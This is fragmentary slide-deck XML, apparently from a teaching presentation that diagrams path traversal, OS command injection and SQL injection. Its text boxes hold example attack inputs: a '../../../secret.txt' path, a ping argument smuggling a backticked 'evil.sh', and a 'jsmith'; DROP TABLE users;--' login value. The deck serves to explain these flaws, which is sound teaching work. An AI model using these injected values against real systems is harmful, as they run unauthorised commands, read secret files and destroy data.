              <a:off x="1277640" y="451404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4" name="TextBox 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1228680" y="5415480"/>
              <a:ext cx="105012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25" name="Curved Connector 21"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="326" idx="2"/>
            <a:endCxn id="323" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1996560" y="2684880"/>
            <a:ext cx="1586520" cy="2072520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25011"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081440" y="3427200"/>
            <a:ext cx="2765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../../../secret.txt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8" name="Graphic 11" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1525680" y="2315520"/>
            <a:ext cx="456120" cy="456120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="329" name="Graphic 13" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3369600" y="2015280"/>
            <a:ext cx="912600" cy="912600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="330" name="Graphic 49" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2658960" y="2167200"/>
            <a:ext cx="709920" cy="709920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="331" name="Graphic 50" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2050560" y="2269440"/>
            <a:ext cx="584280" cy="584280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="332" name="Curved Connector 60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="329" idx="2"/>
            <a:endCxn id="320" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="3075480" y="3678120"/>
            <a:ext cx="1512720" cy="11880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25017"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="333" name="Curved Connector 65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="330" idx="0"/>
            <a:endCxn id="329" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="3039480" y="2141280"/>
            <a:ext cx="761040" cy="812160"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19261"/>
              <a:gd name="adj2" fmla="val -65898"/>
              <a:gd name="adj3" fmla="val 119261"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="334" name="Curved Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="331" idx="0"/>
            <a:endCxn id="330" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="2374200" y="2237400"/>
            <a:ext cx="608040" cy="671760"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -24703"/>
              <a:gd name="adj2" fmla="val -70294"/>
              <a:gd name="adj3" fmla="val 124703"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="335" name="Curved Connector 78"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="328" idx="0"/>
            <a:endCxn id="331" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="1779120" y="2289960"/>
            <a:ext cx="538560" cy="589320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28227"/>
              <a:gd name="adj2" fmla="val -69254"/>
              <a:gd name="adj3" fmla="val 128227"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Rectangle 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473040" y="2071800"/>
            <a:ext cx="1270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secret.txt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TextBox 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918240" y="4128840"/>
            <a:ext cx="2765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file.txt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1173600" y="2109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OS Command Injection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39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1123560" y="1898280"/>
            <a:ext cx="1371240" cy="1666080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="340" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="4358880"/>
            <a:ext cx="1050120" cy="1548360"/>
            <a:chOff x="1329120" y="4358880"/>
            <a:chExt cx="1050120" cy="1548360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="341" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1339200" y="435888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2" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="5268960"/>
              <a:ext cx="105012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43" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="341" idx="0"/>
            <a:endCxn id="339" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1414800" y="3958200"/>
            <a:ext cx="794880" cy="6480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24966"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631520" y="3926520"/>
            <a:ext cx="2262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host: ABC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`evil.sh`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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184760" y="1582560"/>
            <a:ext cx="1144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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3450960" y="1713600"/>
            <a:ext cx="2247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Operating System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47" name="Curved Connector 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="339" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494800" y="2731320"/>
            <a:ext cx="1390680" cy="2880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 34722"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2306880" y="2398320"/>
            <a:ext cx="17481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808080"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>ping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 ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>`evil.sh`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49" name="Group 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735880" y="1483200"/>
            <a:ext cx="1565280" cy="968400"/>
            <a:chOff x="5735880" y="1483200"/>
            <a:chExt cx="1565280" cy="968400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="350" name="Graphic 30" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="1483200"/>
              <a:ext cx="1159560" cy="968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1" name="Rectangle 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="1483200"/>
              <a:ext cx="1565280" cy="226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900" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>&gt;_ ping ABC</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="9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52" name="Group 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735880" y="2808720"/>
            <a:ext cx="1565280" cy="968400"/>
            <a:chOff x="5735880" y="2808720"/>
            <a:chExt cx="1565280" cy="968400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="353" name="Graphic 53" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="2808720"/>
              <a:ext cx="1159560" cy="968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4" name="Rectangle 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="2808720"/>
              <a:ext cx="156528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000" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>&gt;_ evil.sh</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US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55" name="Straight Arrow Connector 56"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="350" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5128560" y="1967400"/>
            <a:ext cx="607680" cy="766800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="356" name="Straight Arrow Connector 57"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="353" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128560" y="2733840"/>
            <a:ext cx="607680" cy="559440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tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Rectangle 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787360" y="1739880"/>
            <a:ext cx="116856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CA" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="f4f4f4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>ping: cannot resolve ABC: Unknown host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Rectangle 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847120" y="3149640"/>
            <a:ext cx="1168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CA" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="f4f4f4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; : 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9" name="Graphic 63" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3913200" y="2152800"/>
            <a:ext cx="1156680" cy="115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Box 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2291760" y="2376720"/>
            <a:ext cx="374832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432ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE user='</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>jsmith'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2445120" y="51012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SQL Injection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62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1123560" y="1898280"/>
            <a:ext cx="1371240" cy="1666080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="363" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="4404960"/>
            <a:ext cx="1050120" cy="1548360"/>
            <a:chOff x="1329120" y="4404960"/>
            <a:chExt cx="1050120" cy="1548360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="364" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1339200" y="440496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5" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="5315040"/>
              <a:ext cx="105012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66" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="364" idx="0"/>
            <a:endCxn id="362" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1391760" y="3981240"/>
            <a:ext cx="840960" cy="6480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24967"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443240" y="3928680"/>
            <a:ext cx="4181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user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: jsmith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'; DROP TABLE users;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>--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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184760" y="1582560"/>
            <a:ext cx="1144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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966200" y="1701000"/>
            <a:ext cx="2619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SQL Database Server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70" name="Curved Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379240" y="2623680"/>
            <a:ext cx="3393720" cy="13320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25005"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Can 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772600" y="2130840"/>
            <a:ext cx="1135080" cy="1196640"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="18000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4472c4">
                <a:shade val="50000"/>
                <a:alpha val="2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372" name="Curved Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2379240" y="2949480"/>
            <a:ext cx="3393720" cy="21240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25005"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3371760" y="2729160"/>
            <a:ext cx="15220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c00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>DROP TABLE users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4" name="Picture 26" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="82197" t="2808" r="2087" b="69373"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084000" y="2427840"/>
            <a:ext cx="515880" cy="645120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="3003120"/>
            <a:ext cx="797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users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6" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6145920" y="2644920"/>
            <a:ext cx="357120" cy="325440"/>
            <a:chOff x="6145920" y="2644920"/>
            <a:chExt cx="357120" cy="325440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="377" name="Straight Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6145920" y="2644920"/>
              <a:ext cx="357480" cy="325800"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="ff0000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="378" name="Straight Connector 31"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6145920" y="2644920"/>
              <a:ext cx="357480" cy="325800"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="ff0000"/>
              </a:solidFill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9" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3785760" y="2090880"/>
            <a:ext cx="1577520" cy="125100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3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1307160" y="697680"/>
            <a:ext cx="1213560" cy="113904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4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2781720" y="692640"/>
            <a:ext cx="1694160" cy="1149480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4736160" y="692640"/>
            <a:ext cx="1653840" cy="1182960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6803280" y="698760"/>
            <a:ext cx="1909080" cy="1322280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Picture 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9126000" y="696600"/>
            <a:ext cx="1806840" cy="1314720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192320" y="2090880"/>
            <a:ext cx="2251080" cy="1351800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Picture 10" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736240" y="2090880"/>
            <a:ext cx="1747440" cy="1247400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Picture 11" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7738920" y="2125800"/>
            <a:ext cx="1583280" cy="1469160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Picture 12" descr=""/>
          <p:cNvPicPr/>
